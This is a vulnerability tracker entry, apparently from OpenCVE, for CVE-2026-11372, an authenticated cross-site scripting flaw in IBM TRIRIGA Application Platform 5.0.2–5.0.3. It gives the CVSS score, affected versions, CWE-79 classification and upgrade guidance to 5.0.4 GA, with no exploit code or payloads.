Description
IBM TRIRIGA Application Platform 5.0.2 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Published: 2026-06-22
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

IBM TRIRIGA Application Platform versions 5.0.2 through 5.0.3 contain a cross‑site scripting flaw that permits an authenticated user to inject arbitrary JavaScript into the web interface. Such injection can manipulate page behavior and potentially lead to credential disclosure within the user’s trusted session, representing a moderate‑severity vector that affects confidentiality and integrity.

Affected Systems

The affected products are IBM TRIRIGA Application Platform, specifically versions 5.0.2 and 5.0.3. The official fix is delivered in version 5.0.4 GA and later releases.

Risk and Exploitability

The vulnerability carries a CVSS score of 5.4 and is not listed in the CISA KEV catalog, indicating a moderate but not critical threat. Attackers need valid, authenticated access to the system’s web interface; once they have it they can execute crafted JavaScript. Because the EPSS score is not available, the likelihood of exploitation is uncertain, but the flaw could be abused by insiders or compromised accounts to exfiltrate credentials and other sensitive data.

Generated by OpenCVE AI on June 22, 2026 at 16:30 UTC.

Remediation

Vendor Solution

An holistic approach has been implemented to address XSS vulnerabilities across the application as part of IBM TRIRIGA Application Platform 5.0.4 GA. This vulnerability is also part of it. Customers using affected versions of IBM TRIRIGA should upgrade to IBM TRIRIGA Application Platform 5.0.4 GA or a later supported release containing the fix. IBM recommends applying the latest available maintenance to ensure protection against this vulnerability. Reference : https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7ETivoli&product[…]GA+Application+Platform&release=5.0.4&platform=All&function=all https://www.ibm.com/support/fixcentral/swg/selectFixes

OpenCVE Recommended Actions

  • Upgrade IBM TRIRIGA to version 5.0.4 GA or a later maintenance release that contains the fix.
  • Apply the latest available maintenance update immediately after upgrading to ensure all patches are in place.
  • Limit user privileges to the minimum necessary roles to reduce the risk that an authenticated attacker can inject malicious scripts.

Generated by OpenCVE AI on June 22, 2026 at 16:30 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Mon, 22 Jun 2026 18:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 22 Jun 2026 15:45:00 +0000

Type Values Removed Values Added
Description IBM TRIRIGA Application Platform 5.0.2 through 5.0.3 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.
Title IBM TRIRIGA Cross-Site Scripting Vulnerability
First Time appeared Ibm
Ibm tririga Application Platform
Weaknesses CWE-79
CPEs cpe:2.3:a:ibm:tririga_application_platform:5.0.2:*:*:*:*:*:*:*
cpe:2.3:a:ibm:tririga_application_platform:5.0.3:*:*:*:*:*:*:*
Vendors & Products Ibm
Ibm tririga Application Platform
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N'}

Subscriptions

Ibm Tririga Application Platform
cve-icon MITRE

Status: PUBLISHED

Assigner: ibm

Published:

Updated: 2026-06-22T15:57:43.139Z

Reserved: 2026-06-05T12:09:50.632Z

Link: CVE-2026-11372

cve-icon Vulnrichment

Updated: 2026-06-22T15:57:38.741Z

cve-icon NVD

No data.

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-22T17:45:05Z

Weaknesses
  • CWE-79

    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')